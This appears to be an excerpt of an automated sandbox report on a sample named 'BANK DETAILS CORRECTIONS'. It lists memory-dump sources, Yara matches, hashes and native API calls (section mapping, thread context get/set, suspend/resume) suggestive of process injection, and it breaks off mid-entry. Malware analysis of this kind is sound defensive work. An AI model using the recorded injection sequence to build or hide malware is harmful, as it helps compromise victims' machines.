                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: O5
                                                                                    • API String ID: 0-2171260883
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.4%
                                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                                    Signature Coverage:16.2%
                                                                                    Total number of Nodes:278
                                                                                    Total number of Limit Nodes:26

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(%q@,00000089,?,?,?), ref: 0040AD6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID: %q@$%q@
                                                                                    • API String ID: 947044025-3377134125
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,Ap@,00000000,?,?,08000000), ref: 0040B1A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateSection
                                                                                    • String ID: Ap@
                                                                                    • API String ID: 2449625523-3623487107
                                                                                    • Opcode ID: e5879d3cfbf2304aafbf97c9e634e03d3bed9e9ea54524e95573ce4af354e39a
                                                                                    • Instruction ID: 0381bab49cd4c8b4b5159a166a4b27d29b29071425fa3ca34d24dcdad5d17ccd
                                                                                    • Opcode Fuzzy Hash: e5879d3cfbf2304aafbf97c9e634e03d3bed9e9ea54524e95573ce4af354e39a
                                                                                    • Instruction Fuzzy Hash: 54711D71E04158DBCB05CFA9C890AEDBBF1BF49304F18816AE459BB341D734A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B601
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b3859685d2cd249508ae90d2a5df4da341d02166a87b09ae450acdbf32f33dea
                                                                                    • Instruction ID: 11dc76d2ff46ad369f84af84ef416579dfba8aa7f4f7d5f825c12d343142f3b7
                                                                                    • Opcode Fuzzy Hash: b3859685d2cd249508ae90d2a5df4da341d02166a87b09ae450acdbf32f33dea
                                                                                    • Instruction Fuzzy Hash: C2813BB1E04158DFCB04CFA9C890AEDBBF5AF4D304F1881AAE459A7341D734A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00407084,?,?,?,00000000), ref: 0040B3CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SectionView
                                                                                    • String ID:
                                                                                    • API String ID: 1323581903-0
                                                                                    • Opcode ID: 0866cf4b95f103e47141c3cf05aef34de53527172598e38c206646d317e0ed2b
                                                                                    • Instruction ID: 7815fb951351c9600068ff048e4789ad6ddc86b8868e2be42b241be52a63fafb
                                                                                    • Opcode Fuzzy Hash: 0866cf4b95f103e47141c3cf05aef34de53527172598e38c206646d317e0ed2b
                                                                                    • Instruction Fuzzy Hash: F0711AB1E04158DBCB04CFA9C490AEDBBF5BF49304F18816AE859A7345D638A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B829
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: dc765def1bd5507d76e0b79e000c2fca93ad6087eb27bfe579b98170dd7e6c15
                                                                                    • Instruction ID: 23ea5d1df1a36d78c489dbe9be50a4534a115f97f07db2c7e60c0155cc345583
                                                                                    • Opcode Fuzzy Hash: dc765def1bd5507d76e0b79e000c2fca93ad6087eb27bfe579b98170dd7e6c15
                                                                                    • Instruction Fuzzy Hash: D0713C71E04158DBCB04CFA9C490AEDBBF5BF49304F18816AE459B7351D734A942CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C0AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 74f5b944877f66db78025bd3e4938ec45131c11e63da4c866314f01efce51fb0
                                                                                    • Instruction ID: a4d7bfa13041059b49b11f8f6e344e758919433d6fe80d36613e7d55410698a1
                                                                                    • Opcode Fuzzy Hash: 74f5b944877f66db78025bd3e4938ec45131c11e63da4c866314f01efce51fb0
                                                                                    • Instruction Fuzzy Hash: 9C712C71E04158DFCB05CFA9C890AEDBBF1BF49304F18816AE459BB381D639A942CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtGetContextThread.NTDLL(?,?), ref: 0040A94D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: 3225c519f2516d18a3c0e030143c325659fdcde7e9fd1b19f1ea2b5a5356a634
                                                                                    • Instruction ID: 5a11b14fb5c226ef2517cc243eb130f814e1a6696c6d4c9390035bbedccb988b
                                                                                    • Opcode Fuzzy Hash: 3225c519f2516d18a3c0e030143c325659fdcde7e9fd1b19f1ea2b5a5356a634
                                                                                    • Instruction Fuzzy Hash: F5715FB1E04258DFCB04CFA9C490AEDBBF1BF49314F18806AE459B7381D638A952CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtSetContextThread.NTDLL(?,?), ref: 0040AB5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: 011570ddb7b065925eace56ea3ff63214166f04baa1dae47dd0756f52dee1737
                                                                                    • Instruction ID: 01d1d1ca2a9dcc4d3737307ec8090fca9c95f74e01fab84ae49ae576f4f644e2
                                                                                    • Opcode Fuzzy Hash: 011570ddb7b065925eace56ea3ff63214166f04baa1dae47dd0756f52dee1737
                                                                                    • Instruction Fuzzy Hash: 6E717170E04258DFCB04CFA9C490AEDBBF2BF49304F1881AAE459B7381D638A952CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtDelayExecution.NTDLL(0041BF41,00000089,?,?,00000000), ref: 0040BC7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DelayExecution
                                                                                    • String ID:
                                                                                    • API String ID: 1249177460-0
                                                                                    • Opcode ID: 9eefccdc5a9b0cbf85704d06a39a1828bd053a4bea36f44141480640af2b7367
                                                                                    • Instruction ID: f6d0d2a850d2609eca22e7acb0f7eb6f9cb02f316128d4b7d2185fc13f9d3ffd
                                                                                    • Opcode Fuzzy Hash: 9eefccdc5a9b0cbf85704d06a39a1828bd053a4bea36f44141480640af2b7367
                                                                                    • Instruction Fuzzy Hash: 8A713B71D08258DBDB04CFA9C490AEDBBF1BF49304F1880AAE455B7381D738A942DF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtSuspendThread.NTDLL(?,?), ref: 0040A73D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SuspendThread
                                                                                    • String ID:
                                                                                    • API String ID: 3178671153-0
                                                                                    • Opcode ID: d472e0894435b7cb11040e371dfd6c15ed46b6229c147a4e0a85cdd993f7feaa
                                                                                    • Instruction ID: 7b87983295c1975e573cccaea1807d253bc69fe9b50c9518089b1f42f66d1efa
                                                                                    • Opcode Fuzzy Hash: d472e0894435b7cb11040e371dfd6c15ed46b6229c147a4e0a85cdd993f7feaa
                                                                                    • Instruction Fuzzy Hash: 65717D75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE459BB381D638A952DF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 7b39c97d39e9569075fd7618efb5991768fd47f372a6003220b835332d61c085
                                                                                    • Instruction ID: 45e01bb4d54996271e004354ee7b3702c07220f7e15f66f0c16626fe8b1d8f71
                                                                                    • Opcode Fuzzy Hash: 7b39c97d39e9569075fd7618efb5991768fd47f372a6003220b835332d61c085
                                                                                    • Instruction Fuzzy Hash: 25015EB1E0020DABDF10DBE5DC42FDEB378AB54304F0081AAE90897240FA34EB548BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 453e6cfba8c9129f7ee349f91f806ae51a01e0977e6307b71bc45d99f42460d8
                                                                                    • Instruction ID: c2ebf23bf8a8e93cf6e3ed7e6b0dc9686192a16424ea79d4559035af49a5a00d
                                                                                    • Opcode Fuzzy Hash: 453e6cfba8c9129f7ee349f91f806ae51a01e0977e6307b71bc45d99f42460d8
                                                                                    • Instruction Fuzzy Hash: 3FE086753447147BD620EA5AEC41F9BB76CDFC5714F408019FA0C67242C674B90187F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                    • Instruction ID: 88cdd937a8cd9545f647cf91fed95189d442a3eeaab275bb04f8af9c1128e21c
                                                                                    • Opcode Fuzzy Hash: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                    • Instruction Fuzzy Hash: BE9002612025000341097158441C616804E9BE0201B55C031E1054590DC52589916225
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                    • Instruction ID: 029e9dac7dce4cfb8fe1404899387a03c5af09e565dc05cf1cd320d702fa6585
                                                                                    • Opcode Fuzzy Hash: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                    • Instruction Fuzzy Hash: 3E90023120150413D1157158450C707404D9BD0241F95C422A0464558DD6568A52A221
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                    • Instruction ID: c4e71a7086309dd2fe3367d763fcf027edf77506a9fbc6924d95cec9ac6a08c2
                                                                                    • Opcode Fuzzy Hash: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                    • Instruction Fuzzy Hash: 8D90023120158802D1147158840C74A40499BD0301F59C421A4464658DC69589917221
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                    • Instruction ID: 1ae0065d480f3158949c3ded3739873f828b38a783ab809c5d9955b2036f13fa
                                                                                    • Opcode Fuzzy Hash: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                    • Instruction Fuzzy Hash: A690023160560402D1047158451C70650499BD0201F65C421A0464568DC7958A5166A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 0-2189309204
                                                                                    • Opcode ID: 862d7b2a6c360aaa78220afbe2528a1a57d91472e4107e50879de8c1aaf0c283
                                                                                    • Instruction ID: 0b85d369537311390d687d26abeb6c178b81055b760ee89a44215341b0526db2
                                                                                    • Opcode Fuzzy Hash: 862d7b2a6c360aaa78220afbe2528a1a57d91472e4107e50879de8c1aaf0c283
                                                                                    • Instruction Fuzzy Hash: 53410231D04A88FFDB11DBA4DC01ADF7F68EF82394F0446AAE86097201E3694D82C7D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: df382edde562c5137b57b7e5469ad8965567df63001ebe344c0c05c76430cabf
                                                                                    • Instruction ID: f148c3bdcacf736117f5a739be3c2526ec9c890946bf86766c001232612204ac
                                                                                    • Opcode Fuzzy Hash: df382edde562c5137b57b7e5469ad8965567df63001ebe344c0c05c76430cabf
                                                                                    • Instruction Fuzzy Hash: A2110871E0115C7ADB11ABE19C81DEF7B7CDF41394F458069F904AB241E5784F0687B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: 0c9fe3ea84d98d91abba0a634582ccc9f0e6eb57935dbdb8d497115938ed7cf1
                                                                                    • Instruction ID: 6afdc057e73596c918169fd5dccdf02bd1858511460734cbfe86c2ebff124242
                                                                                    • Opcode Fuzzy Hash: 0c9fe3ea84d98d91abba0a634582ccc9f0e6eb57935dbdb8d497115938ed7cf1
                                                                                    • Instruction Fuzzy Hash: 3211E572E0115CBADB11AAE19C81EEF7B7CDF41394F05806AF904AB241E5785E0687B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(DC886F4,00000111,00000000,00000000), ref: 0041547A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: DC886F4$DC886F4
                                                                                    • API String ID: 1836367815-2189309204
                                                                                    • Opcode ID: 565e4c13c1d60db92e9943f979866ad661dae9a70cb11df164f6fcbaa01586c0
                                                                                    • Instruction ID: 0ed0ca8212df65a8136205b0c2bef0222b79361c4e516e95636b7f27008054fd
                                                                                    • Opcode Fuzzy Hash: 565e4c13c1d60db92e9943f979866ad661dae9a70cb11df164f6fcbaa01586c0
                                                                                    • Instruction Fuzzy Hash: F501D6B1E4111C7ADB11AAE19C81DEF7B7CDF40398F048069FA04B7240E6785E068BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
